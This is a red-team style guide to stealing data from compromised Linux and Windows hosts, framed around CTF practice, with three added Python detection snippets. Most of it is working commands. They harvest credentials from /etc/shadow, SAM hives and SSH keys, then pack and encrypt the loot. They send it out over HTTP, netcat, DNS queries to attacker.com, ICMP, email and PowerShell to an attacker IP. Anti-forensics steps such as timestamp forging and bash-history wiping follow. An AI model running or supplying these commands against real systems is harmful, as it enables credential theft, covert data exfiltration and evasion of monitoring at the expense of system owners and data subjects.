Exfiltration & Data Theft
Exfiltration & Data Theft Techniques — Loot. Compress. Vanish.
Once access is achieved, the mission shifts from exploitation to exfiltration — extracting valuable data, credentials, or flags while avoiding detection. This guide covers real-world methods to gather, compress, and stealthily exfiltrate data from compromised systems, both manually and automatically.
I. 🧩 Core Concepts

| Concept | Meaning |
|---|---|
| Exfiltration | Transferring sensitive data from the target to your system. |
| Loot | Valuable artifacts: flags, passwords, tokens, databases, keys. |
| Compression | Reducing file size for stealth and speed. |
| Encryption | Concealing the contents of exfiltrated data. |
| Stealth | Avoiding detection by monitoring tools, firewalls, or logs. |
II. 🧠 Identify What to Exfiltrate

🔍 Primary Targets

| Category | Examples |
|---|---|
| Credentials | /etc/shadow, SAM/NTDS.dit, browser creds, SSH keys |
| Configs | /var/www/html/config.php, .env, wp-config.php |
| Databases | MySQL, SQLite, PostgreSQL dumps |
| Logs | /var/log/auth.log, event logs |
| Flags / Secrets | flag.txt, API tokens, encryption keys |
III. ⚙️ Data Collection Techniques
🧩 1. File Searching

```bash
find / -type f -iname "*flag*" 2>/dev/null
# group the -o alternatives, otherwise -type f applies only to the *.conf branch
find / -type f \( -name "*.conf" -o -name "*.log" \) 2>/dev/null
```

🧠 2. Keyword Extraction
```bash
grep -ri "password" /var/www 2>/dev/null
grep -ri "key" /home 2>/dev/null
```

🧩 3. Database Dumping
```bash
mysqldump -u root -p database > dump.sql
sqlite3 database.db .dump > dump.txt
```

💣 4. Credential Harvesting
```bash
cat /etc/passwd
cat /etc/shadow
find /home -name "id_rsa" 2>/dev/null
```

Windows:

```cmd
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
reg save HKLM\SECURITY security
```

Then extract:

```bash
secretsdump.py -sam sam -system system -security security LOCAL
```

IV. 🧰 Compressing & Packaging Data
🧩 Linux Compression

```bash
tar czf loot.tar.gz /etc/passwd /var/www/html
```

⚙️ Password-Protected Zip

```bash
zip -rP 'Sup3rS3cr3t!' data.zip /home/user/loot/
```

🧠 Encrypt Before Exfil

```bash
gpg -c loot.tar.gz
```

(Enter passphrase → creates loot.tar.gz.gpg)
V. 🌐 Exfiltration Methods
🔹 1. HTTP (Quick & Simple)
Attacker:

```bash
python3 -m http.server 8000
```

(Note: the stock `http.server` module serves files over GET only and answers POST with 501, so the uploads below need a listener that accepts POST.)

Victim:

```bash
curl -F "file=@loot.tar.gz" http://10.10.14.2:8000/upload
```

or:

```bash
wget --post-file=loot.tar.gz http://10.10.14.2/upload
```

🔹 2. Reverse File Transfer (Netcat)
Attacker (Receiver):

```bash
nc -lvnp 4445 > loot.tar.gz
```

Victim:

```bash
cat loot.tar.gz | nc 10.10.14.2 4445
```

🔹 3. SCP / SFTP

```bash
scp /tmp/loot.tar.gz user@10.10.14.2:/tmp/
```

or use SSH key injection for stealth.
🔹 4. Exfil via HTTP Request (Stealth)
```bash
curl -X POST -d "data=$(cat flag.txt)" http://10.10.14.2/loot
```

🔹 5. DNS Exfiltration (Covert)
Encode and send data in DNS queries:
```bash
for line in $(cat flag.txt | base32); do
  host $line.attacker.com
done
```

Server-side (attacker):

```bash
sudo tcpdump -i eth0 udp port 53 -n
```

🔹 6. ICMP Exfiltration
```bash
ping -p "$(xxd -p flag.txt)" 10.10.14.2
```

Attacker captures:

```bash
tcpdump -i tun0 icmp -X
```

🔹 7. FTP / SMB Exfil
Upload loot through insecure file shares:
```bash
ftp 10.10.14.2
put loot.zip
```

or:

```bash
smbclient //10.10.14.2/share -U user -c "put loot.tar.gz"
```

🔹 8. Email Exfil (Stealthy)
```bash
# recipient address is a placeholder; the original was lost in extraction
echo "FLAG: $(cat /root/flag.txt)" | mail -s "Daily Report" attacker@example.com
```

VI. 💀 Large File Stealth Exfiltration
🧠 Chunked Uploads
```bash
split -b 1M loot.tar.gz chunk_
for i in chunk_*; do curl -F "file=@$i" http://10.10.14.2/upload; done
```

⚙️ Covert Timing Channel

```bash
while read -r char; do
  ping -c 1 -W 1 10.10.14.2 -p $char
done < flag.txt
```

VII. 🧩 Advanced Exfil Tools
| Tool | Description |
|---|---|
| Nishang (PowerShell) | Includes multiple exfil modules |
| Exfiltrator-CLI | Command-line exfil framework |
| DNSExfiltrator | Base32-encoded DNS data exfil |
| DataSiphon | Stealth exfil tool using HTTP/DNS blending |
| Metasploit post modules | Exfil credentials and files from sessions |
| Empire modules | PowerShell-based exfiltration automation |
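Detection for the base32 DNS channel of section V.5 and of DNSExfiltrator listed above, as an added example that is not from the original page or from any of those tools: it scans resolver query-log lines for client/zone pairs that send many distinct long, high-entropy, base32-alphabet leftmost labels, which is the footprint a `host <chunk>.attacker.com` loop leaves regardless of what the chunks contain. The log format, thresholds and domain names are constructed assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed resolver query-log sample: "<epoch> <client_ip> <qname> <qtype>".
# The 10.0.0.5 lines mirror `host $line.attacker.com` run over base32 chunks of a file.
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com A
1700000001 10.0.0.5 MZXW6YTBOI.attacker.com A
1700000001 10.0.0.5 NBSWY3DPEB3W64TMMQ.attacker.com A
1700000002 10.0.0.5 ORSXG5BAMRQXIYI.attacker.com A
1700000002 10.0.0.5 GEZDGNBVGY3TQOJQ.attacker.com A
1700000003 10.0.0.7 mail.example.com MX
1700000004 10.0.0.7 autodiscover.example.com A
"""

# RFC 4648 base32 alphabet, at least 8 chars, optional '=' padding; case-insensitive
# because resolvers and some tools lowercase names.
BASE32_LABEL = re.compile(r"^[A-Z2-7]{8,}=*$", re.IGNORECASE)

def shannon_entropy(s):
    """Bits per character: encoded data scores high, ordinary hostnames lower."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def parse_queries(log_text):
    """Yield (client, qname) from the constructed log format, dropping any root dot."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) >= 3:
            yield parts[1], parts[2].rstrip(".")

def find_dns_exfil(log_text, min_labels=3, min_entropy=3.0):
    """Return {(client, zone): distinct_encoded_labels} for client/zone pairs that sent
    at least min_labels distinct encoded-looking leftmost labels. The zone is taken as
    the last two labels (simplification; use a public-suffix list in production).
    A single long legitimate name such as autodiscover.example.com passes the regex
    and entropy tests but stays below min_labels, which is why the count matters."""
    per_zone = defaultdict(set)
    for client, qname in parse_queries(log_text):
        labels = qname.split(".")
        if len(labels) < 3:
            continue
        first, zone = labels[0], ".".join(labels[-2:])
        if BASE32_LABEL.match(first) and shannon_entropy(first) >= min_entropy:
            per_zone[(client, zone)].add(first.upper())
    return {k: len(v) for k, v in per_zone.items() if len(v) >= min_labels}
```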
VIII. 🧠 Data Hiding Before Exfiltration
🔹 Steganography
```bash
steghide embed -cf image.jpg -ef loot.txt -p secret
```

Extract later:

```bash
steghide extract -sf image.jpg -p secret
```

🔹 Encode Files

```bash
cat loot.tar.gz | base64 > loot.b64
```

🔹 Compress, Encode, Encrypt (Triple Stack)

```bash
tar czf - loot/ | gpg -c | base64 > loot.enc
```

IX. ⚔️ Full Exfiltration Workflow Example
```bash
# 1. Gather data
find / -type f -iname "*flag*" > loot.txt
# 2. Compress
tar czf loot.tar.gz -T loot.txt
# 3. Encrypt
gpg -c loot.tar.gz
# 4. Exfiltrate
cat loot.tar.gz.gpg | nc 10.10.14.2 4445
```

X. 🧰 Windows-Specific Exfiltration
🔹 Copy System Files
```powershell
copy C:\Users\Admin\Documents\*.docx C:\Temp\
Compress-Archive -Path C:\Temp -DestinationPath loot.zip
```

🔹 Encode + Send via PowerShell

```powershell
$bytes = [System.IO.File]::ReadAllBytes("loot.zip")
$encoded = [System.Convert]::ToBase64String($bytes)
Invoke-WebRequest -Uri "http://10.10.14.2/upload" -Method POST -Body $encoded
```

🔹 SMB Pull

```bash
smbclient //victim/C$ -U user -c "get loot.zip"
```

XI. 🧠 Anti-Detection Techniques
| Technique | Description |
|---|---|
| Timing Jitter | Delay packets to mimic normal traffic. |
| Protocol Mimicry | Use HTTP/HTTPS headers like browsers. |
| Compression + Encryption | Reduce signatures, evade DLP. |
| Filename Spoofing | Name files like report.log or backup.tar. |
| Fragmentation | Split into chunks, reassemble later. |
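Detection for the timing and fragmentation patterns listed above, the timed exfil loop that follows, and the chunked-upload loop of section VI, as an added example that is not part of the original page: it groups POST requests in web-server access-log lines by client and path and flags streams whose inter-request gaps are nearly constant, which is what a fixed `sleep` or a tight upload loop leaves behind even when each request on its own looks benign. The log lines, thresholds and addresses are constructed.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Apache/nginx combined-format line: client, timestamp, method, path, status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

# Constructed access-log sample: 10.0.0.5 posts one line every 2 s to /api/upload,
# the footprint of the `sleep 2` loop; 10.0.0.9 is an ordinary user logging in.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2023:01:01:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Dec/2023:01:01:02 +0000] "POST /api/upload HTTP/1.1" 200 12 "-" "curl/7.88.1"
10.0.0.5 - - [12/Dec/2023:01:01:04 +0000] "POST /api/upload HTTP/1.1" 200 12 "-" "curl/7.88.1"
10.0.0.5 - - [12/Dec/2023:01:01:06 +0000] "POST /api/upload HTTP/1.1" 200 12 "-" "curl/7.88.1"
10.0.0.5 - - [12/Dec/2023:01:01:08 +0000] "POST /api/upload HTTP/1.1" 200 12 "-" "curl/7.88.1"
10.0.0.5 - - [12/Dec/2023:01:01:10 +0000] "POST /api/upload HTTP/1.1" 200 12 "-" "curl/7.88.1"
10.0.0.9 - - [12/Dec/2023:01:02:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Dec/2023:01:09:31 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

def parse_access_log(text):
    """Yield (client, timestamp, method, path) for each line the regex recognises."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            client, ts, method, path, _status, _size = m.groups()
            yield client, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path

def find_periodic_posts(text, min_requests=4, max_cv=0.25):
    """Return {(client, path): (request_count, mean_gap_seconds)} for POST streams
    whose inter-request gaps have a coefficient of variation <= max_cv, i.e. a
    fixed cadence. Thresholds are constructed starting points, not tuned values;
    too low a min_requests flags any pair of requests, as the test shows."""
    times = defaultdict(list)
    for client, ts, method, path in parse_access_log(text):
        if method == "POST":
            times[(client, path)].append(ts)
    hits = {}
    for key, stamps in times.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
        if cv <= max_cv:
            hits[key] = (len(stamps), mean)
    return hits
```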
Example (timed exfil):
```bash
while read -r line; do
  curl -X POST -d "msg=$line" http://10.10.14.2/api/upload
  sleep 2
done < flag.txt
```

XII. 🧠 Pro Tips & Red Team Tricks
✅ Operational Security
Always encrypt loot before transfer.
Change timestamps with:

```bash
touch -t 202312120101 file
```

Delete logs after exfil:

```bash
history -c && rm -rf ~/.bash_history
```
✅ Data Discipline
Maintain loot structure:

```
/loot/
├── creds/
├── flags/
├── configs/
└── screenshots/
```
✅ Stealth
Use proxychains or tunnels (Chisel/SSH).

Obfuscate filenames (report.tmp, sysdata.log).
✅ Post-Exfil Cleanup
```bash
shred -u loot.tar.gz.gpg
```

Remove staging dirs, clear temp folders.
XIII. ⚙️ Quick Reference Table
| Method | Command | Notes |
|---|---|---|
| Netcat | `cat file \| nc IP PORT` | |
| HTTP | `curl -F "file=@f" URL` | Blends in |
| SCP | `scp file user@host:` | Secure, traceable |
| DNS | `host data.attacker.com` | Covert |
| ICMP | `ping -p data IP` | Very covert |
| Stego | `steghide embed ...` | Visual disguise |
| Zip+Enc | `zip -rP 'pw' data.zip` | Encrypted |
| PowerShell | `Invoke-WebRequest ...` | Stealth on Windows |
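The ICMP row above and section V.6 rely on the echo payload carrying the data. On the detection side, as an added example that is not from the original page: parse an ICMP echo packet, verify its checksum, and classify the data as the default Linux or Windows ping fill or as mostly printable text, which is what `ping -p "$(xxd -p flag.txt)"` produces because the hex pattern decodes back into the file's own bytes. The fill patterns and the 16-byte timestamp slot are assumptions taken from captures of unmodified ping; the packets are constructed inside the block.

```python
import struct

# Default data iputils ping places after its 16-byte timestamp: byte i holds value i
# (assumption based on captures of unmodified Linux ping; adjust for other stacks).
DEFAULT_LINUX_FILL = bytes(range(16, 56))
WINDOWS_FILL = b"abcdefghijklmnopqrstuvwabcdefghi"

def icmp_checksum(data):
    """RFC 1071 one's-complement sum over header + payload; 0 for a valid packet."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_echo(payload, ident=0x1234, seq=1):
    """Construct an ICMP echo request with a correct checksum (used only for samples)."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = icmp_checksum(hdr + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload

def classify_echo(pkt):
    """Label the data of an ICMP echo/reply: 'default-fill', 'windows-fill',
    'text-payload' (mostly printable ASCII after the timestamp slot) or 'other'.
    Raises ValueError on a truncated packet or a bad checksum."""
    if len(pkt) < 8 or icmp_checksum(pkt) != 0:
        raise ValueError("truncated ICMP packet or bad checksum")
    if pkt[0] not in (0, 8):
        return "not-echo"
    data = pkt[8:]
    if len(data) > 16 and data[16:] == DEFAULT_LINUX_FILL[: len(data) - 16]:
        return "default-fill"
    if data.startswith(WINDOWS_FILL):
        return "windows-fill"
    body = data[16:] if len(data) > 16 else data  # skip the timestamp slot
    if body and sum(32 <= b < 127 for b in body) / len(body) > 0.9:
        return "text-payload"
    return "other"

# Constructed samples: an unmodified Linux ping, and a ping whose -p pattern (max 16
# bytes, repeated by ping to fill the payload) carries the first bytes of a file.
SAMPLE_DEFAULT = build_echo(bytes(16) + DEFAULT_LINUX_FILL)
SAMPLE_TEXT = build_echo(bytes(16) + (b"flag{c0nstructed" * 3)[:40])
```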
XIV. 🧩 Real-World Exfil Example (CTF Workflow)
```bash
# Attacker
nc -lvnp 4445 > loot.tar.gz.gpg
# Victim
tar czf - /home /var/www | gpg -c | nc 10.10.14.2 4445
```

Decrypt after exfil:
```bash
gpg -d loot.tar.gz.gpg | tar xz
```